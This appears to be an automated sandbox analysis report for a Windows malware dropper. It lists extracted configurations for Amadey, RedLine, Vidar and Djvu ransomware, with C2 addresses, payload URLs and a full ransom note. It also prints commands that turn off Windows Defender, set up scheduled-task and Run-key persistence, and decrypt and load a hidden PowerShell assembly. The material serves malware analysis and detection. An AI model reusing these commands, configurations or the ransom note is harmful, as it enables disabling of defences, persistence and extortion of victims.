Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
31-01-2023 15:22
Behavioral task
behavioral1
Sample
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Resource
win10v2004-20221111-en
General
-
Target
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
-
Size
235KB
-
MD5
67bb41448f41511e169c83230d7e9486
-
SHA1
dde5a6577a966a9e8713e66ad7ef50b840dd114e
-
SHA256
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b
-
SHA512
84baf5659cee4e55f48ea0523e2f30c5c6d696d5881da7f628cb4450f1dfc949396ee48cbded60dc98b53483aeb5cdf7fbe4970ab612049356185f2aadf02d84
-
SSDEEP
6144:ILUoeyDABOdDubDXqgraG0JzSRuVyL+VY9QqgE:Ilu0LgwJ4uVyaVgJ
Malware Config
Extracted
amadey
3.66
62.204.41.72/hn85jlUn/index.php
62.204.41.88/9vdVVVjsw/index.php
Extracted
redline
druid
62.204.41.170:4132
-
auth_value
fddcb4126f1d0ea4ac975511b3530e72
Extracted
redline
new1
176.113.115.16:4122
-
auth_value
ac44cbde6633acc9d67419c7278d5c70
Extracted
redline
temp45645645
82.115.223.9:15486
-
auth_value
f7fe7a35c673cce3fa35569cf455f570
Extracted
djvu
http://drampik.com/raud/get.php
-
extension
.assm
-
offline_id
ex4uvTKsM2vEkIcr3MjXi2C6v27h1mS682iUXGt1
-
payload_url
http://uaery.top/dl/build2.exe
http://drampik.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-wY6g3rkhZz Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0638JOsie
Extracted
vidar
2.3
498
https://t.me/mantarlars
https://steamcommunity.com/profiles/76561199474840123
-
profile_id
498
Extracted
vidar
2.3
19
https://t.me/mantarlars
https://steamcommunity.com/profiles/76561199474840123
-
profile_id
19
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4632-226-0x0000000001F50000-0x0000000001F6D000-memory.dmp family_rhadamanthys behavioral2/memory/4632-266-0x0000000001F50000-0x0000000001F6D000-memory.dmp family_rhadamanthys -
Detected Djvu ransomware 9 IoCs
Processes:
resource yara_rule behavioral2/memory/1256-246-0x0000000002240000-0x000000000235B000-memory.dmp family_djvu behavioral2/memory/1832-244-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1832-242-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1832-240-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1832-247-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1832-279-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3988-310-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3988-312-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3988-322-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Processes:
moda.exemoda1.exetrena1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" moda1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" trena1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" trena1.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 59 4764 powershell.exe 65 4764 powershell.exe 66 4764 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 30 IoCs
Processes:
nbveek.exemoda.exetrena1.exedruid1.exenitka.exemoda1.exedruid.exenitka1.exelebro.exenbveek.exefular.exefular1.exeuplagin.exevina.exeraud-290123del700_2023-01-29_12-52.exevina1.exejn-17L.exeLummaC2.exevideo.exeraud-290123del700_2023-01-29_12-52.exeEngine.exeraud-290123del700_2023-01-29_12-52.exeraud-290123del700_2023-01-29_12-52.exenbveek.exeRussian.exe.pifbuild2.exebuild3.exebuild2.exenbveek.exemstsca.exepid process 2348 nbveek.exe 5040 moda.exe 3132 trena1.exe 4768 druid1.exe 2016 nitka.exe 4376 moda1.exe 4408 druid.exe 2868 nitka1.exe 1824 lebro.exe 3092 nbveek.exe 4644 fular.exe 2112 fular1.exe 4192 uplagin.exe 4004 vina.exe 1256 raud-290123del700_2023-01-29_12-52.exe 4632 vina1.exe 3980 jn-17L.exe 4692 LummaC2.exe 3572 video.exe 1832 raud-290123del700_2023-01-29_12-52.exe 4940 Engine.exe 3968 raud-290123del700_2023-01-29_12-52.exe 3988 raud-290123del700_2023-01-29_12-52.exe 4968 nbveek.exe 3628 Russian.exe.pif 1080 build2.exe 3068 build3.exe 636 build2.exe 2580 nbveek.exe 4776 mstsca.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\SETUP_33494\Engine.exe upx C:\Users\Admin\AppData\Local\Temp\SETUP_33494\Engine.exe upx behavioral2/memory/4940-256-0x0000000000400000-0x0000000000558000-memory.dmp upx behavioral2/memory/4940-328-0x0000000000400000-0x0000000000558000-memory.dmp upx -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
raud-290123del700_2023-01-29_12-52.exeRussian.exe.pifnbveek.exenbveek.exejn-17L.exevideo.exef3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exelebro.exeraud-290123del700_2023-01-29_12-52.exebuild2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation raud-290123del700_2023-01-29_12-52.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Russian.exe.pif Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation jn-17L.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation video.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation lebro.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation raud-290123del700_2023-01-29_12-52.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation build2.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gtuyogbu2fj.lnk powershell.exe -
Loads dropped DLL 10 IoCs
Processes:
video.exebuild2.exerundll32.exerundll32.exerundll32.exerundll32.exeRussian.exe.pifpid process 3572 video.exe 3572 video.exe 636 build2.exe 636 build2.exe 2276 rundll32.exe 2168 rundll32.exe 4476 rundll32.exe 3560 rundll32.exe 3628 Russian.exe.pif 3628 Russian.exe.pif -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
moda1.exemoda.exetrena1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" moda1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" moda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" trena1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
nbveek.exeraud-290123del700_2023-01-29_12-52.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\druid1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000003051\\druid1.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nitka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000004051\\nitka.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\druid.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000006051\\druid.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c9094404-ede7-4d22-b457-ed266ce0638f\\raud-290123del700_2023-01-29_12-52.exe\" --AutoStart" raud-290123del700_2023-01-29_12-52.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 api.2ip.ua 25 api.2ip.ua 37 api.2ip.ua -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
vina1.exepid process 4632 vina1.exe 4632 vina1.exe 4632 vina1.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
raud-290123del700_2023-01-29_12-52.exeraud-290123del700_2023-01-29_12-52.exebuild2.exedescription pid process target process PID 1256 set thread context of 1832 1256 raud-290123del700_2023-01-29_12-52.exe raud-290123del700_2023-01-29_12-52.exe PID 3968 set thread context of 3988 3968 raud-290123del700_2023-01-29_12-52.exe raud-290123del700_2023-01-29_12-52.exe PID 1080 set thread context of 636 1080 build2.exe build2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4020 2016 WerFault.exe nitka.exe 4368 2868 WerFault.exe nitka1.exe 404 2112 WerFault.exe fular1.exe 3136 3572 WerFault.exe video.exe 2220 4476 WerFault.exe rundll32.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vina1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vina1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID vina1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vina1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vina1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vina1.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build2.exeRussian.exe.pifvideo.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Russian.exe.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Russian.exe.pif Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 video.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString video.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1748 schtasks.exe 4896 schtasks.exe 4756 schtasks.exe 4256 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 540 timeout.exe 3524 timeout.exe 1612 timeout.exe -
Modifies registry class 8 IoCs
Processes:
powershell.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\x5qqghbc1kh\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\x5qqghbc1kh\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]43,40,34,231,152,221,253,185,62,148,240,241,99,206,96,33,14,60,169,236,234,238,30,154,71,251,34,196,130,93,105,193);$A.IV=@([byte]12,149,177,4,191,6,243,253,155,163,193,103,144,104,239,238);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\1rwizj101ew.tfkurekfrmk'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[xF9MBhD11Uboko4.PbxDwsvP6fEK0qiF26sgtXEsvZYYfDOk56NDcpRwBQsm5JPMxpMT0PxTTSJxPvtdOqtePwvITy4GLpW8H]::SaDHVXEPeR09i1FG9E5Li7xIYPSH();\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.tfkurekfrmk powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.tfkurekfrmk\ = "x5qqghbc1kh" powershell.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4246620582-653642754-1174164128-1000\{8C35321D-39EE-4106-B80C-DBF51190CD43} svchost.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\x5qqghbc1kh\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\x5qqghbc1kh powershell.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\x5qqghbc1kh\shell powershell.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
Processes:
moda.exetrena1.exemoda1.exedruid1.exenitka.exedruid.exefular.exevina.exeraud-290123del700_2023-01-29_12-52.exepowershell.exefular1.exenitka1.exepowershell.exepowershell.exevideo.exeraud-290123del700_2023-01-29_12-52.exeRussian.exe.pifbuild2.exepid process 5040 moda.exe 5040 moda.exe 3132 trena1.exe 3132 trena1.exe 4376 moda1.exe 4376 moda1.exe 4768 druid1.exe 2016 nitka.exe 4408 druid.exe 4408 druid.exe 4768 2016 nitka.exe 4644 fular.exe 4004 vina.exe 4004 vina.exe 4644 fular.exe 1832 raud-290123del700_2023-01-29_12-52.exe 1832 raud-290123del700_2023-01-29_12-52.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 2112 fular1.exe 2112 fular1.exe 2868 nitka1.exe 2868 nitka1.exe 2868 nitka1.exe 2112 fular1.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 4252 powershell.exe 4252 powershell.exe 4252 powershell.exe 3572 video.exe 3572 video.exe 4252 powershell.exe 3988 raud-290123del700_2023-01-29_12-52.exe 3988 raud-290123del700_2023-01-29_12-52.exe 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif 636 build2.exe 636 build2.exe 4764 powershell.exe 3628 Russian.exe.pif 3628 Russian.exe.pif -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
moda.exetrena1.exemoda1.exenitka.exedruid1.exenitka1.exedruid.exefular1.exefular.exevina.exepowershell.exevina1.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5040 moda.exe Token: SeDebugPrivilege 3132 trena1.exe Token: SeDebugPrivilege 4376 moda1.exe Token: SeDebugPrivilege 2016 nitka.exe Token: SeDebugPrivilege 4768 druid1.exe Token: SeDebugPrivilege 2868 nitka1.exe Token: SeDebugPrivilege 4408 druid.exe Token: SeDebugPrivilege 2112 fular1.exe Token: SeDebugPrivilege 4644 fular.exe Token: SeDebugPrivilege 4004 vina.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeShutdownPrivilege 4632 vina1.exe Token: SeCreatePagefilePrivilege 4632 vina1.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Russian.exe.pifpid process 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Russian.exe.pifpid process 3628 Russian.exe.pif 3628 Russian.exe.pif 3628 Russian.exe.pif -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid process 3204 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exenbveek.execmd.exelebro.exenbveek.execmd.exedescription pid process target process PID 4688 wrote to memory of 2348 4688 f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe nbveek.exe PID 4688 wrote to memory of 2348 4688 f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe nbveek.exe PID 4688 wrote to memory of 2348 4688 f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe nbveek.exe PID 2348 wrote to memory of 4256 2348 nbveek.exe schtasks.exe PID 2348 wrote to memory of 4256 2348 nbveek.exe schtasks.exe PID 2348 wrote to memory of 4256 2348 nbveek.exe schtasks.exe PID 2348 wrote to memory of 1600 2348 nbveek.exe cmd.exe PID 2348 wrote to memory of 1600 2348 nbveek.exe cmd.exe PID 2348 wrote to memory of 1600 2348 nbveek.exe cmd.exe PID 1600 wrote to memory of 3708 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 3708 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 3708 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 1800 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 1800 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 1800 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 3912 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 3912 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 3912 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 4420 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 4420 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 4420 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 3076 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 3076 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 3076 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 624 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 624 1600 cmd.exe cacls.exe PID 1600 wrote to memory of 624 1600 cmd.exe cacls.exe PID 2348 wrote to memory of 5040 2348 nbveek.exe moda.exe PID 2348 wrote to memory of 5040 2348 nbveek.exe moda.exe PID 2348 wrote to memory of 3132 2348 nbveek.exe trena1.exe PID 2348 wrote to memory of 3132 2348 nbveek.exe trena1.exe PID 2348 wrote to memory of 4768 2348 nbveek.exe druid1.exe PID 2348 wrote to memory of 4768 2348 nbveek.exe druid1.exe PID 2348 wrote to memory of 4768 2348 nbveek.exe druid1.exe PID 2348 wrote to memory of 2016 2348 nbveek.exe nitka.exe PID 2348 wrote to memory of 2016 2348 nbveek.exe nitka.exe PID 2348 wrote to memory of 2016 2348 nbveek.exe nitka.exe PID 2348 wrote to memory of 4376 2348 nbveek.exe moda1.exe PID 2348 wrote to memory of 4376 2348 nbveek.exe moda1.exe PID 2348 wrote to memory of 4408 2348 nbveek.exe druid.exe PID 2348 wrote to memory of 4408 2348 nbveek.exe druid.exe PID 2348 wrote to memory of 4408 2348 nbveek.exe druid.exe PID 2348 wrote to memory of 2868 2348 nbveek.exe nitka1.exe PID 2348 wrote to memory of 2868 2348 nbveek.exe nitka1.exe PID 2348 wrote to memory of 2868 2348 nbveek.exe nitka1.exe PID 2348 wrote to memory of 1824 2348 nbveek.exe lebro.exe PID 2348 wrote to memory of 1824 2348 nbveek.exe lebro.exe PID 2348 wrote to memory of 1824 2348 nbveek.exe lebro.exe PID 1824 wrote to memory of 3092 1824 lebro.exe nbveek.exe PID 1824 wrote to memory of 3092 1824 lebro.exe nbveek.exe PID 1824 wrote to memory of 3092 1824 lebro.exe nbveek.exe PID 3092 wrote to memory of 1748 3092 nbveek.exe schtasks.exe PID 3092 wrote to memory of 1748 3092 nbveek.exe schtasks.exe PID 3092 wrote to memory of 1748 3092 nbveek.exe schtasks.exe PID 3092 wrote to memory of 5076 3092 nbveek.exe cmd.exe PID 3092 wrote to memory of 5076 3092 nbveek.exe cmd.exe PID 3092 wrote to memory of 5076 3092 nbveek.exe cmd.exe PID 5076 wrote to memory of 2568 5076 cmd.exe cmd.exe PID 5076 wrote to memory of 2568 5076 cmd.exe cmd.exe PID 5076 wrote to memory of 2568 5076 cmd.exe cmd.exe PID 5076 wrote to memory of 3444 5076 cmd.exe cacls.exe PID 5076 wrote to memory of 3444 5076 cmd.exe cacls.exe PID 5076 wrote to memory of 3444 5076 cmd.exe cacls.exe PID 5076 wrote to memory of 4324 5076 cmd.exe cacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"4⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:N"4⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:R" /E4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 13724⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 12204⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"4⤵
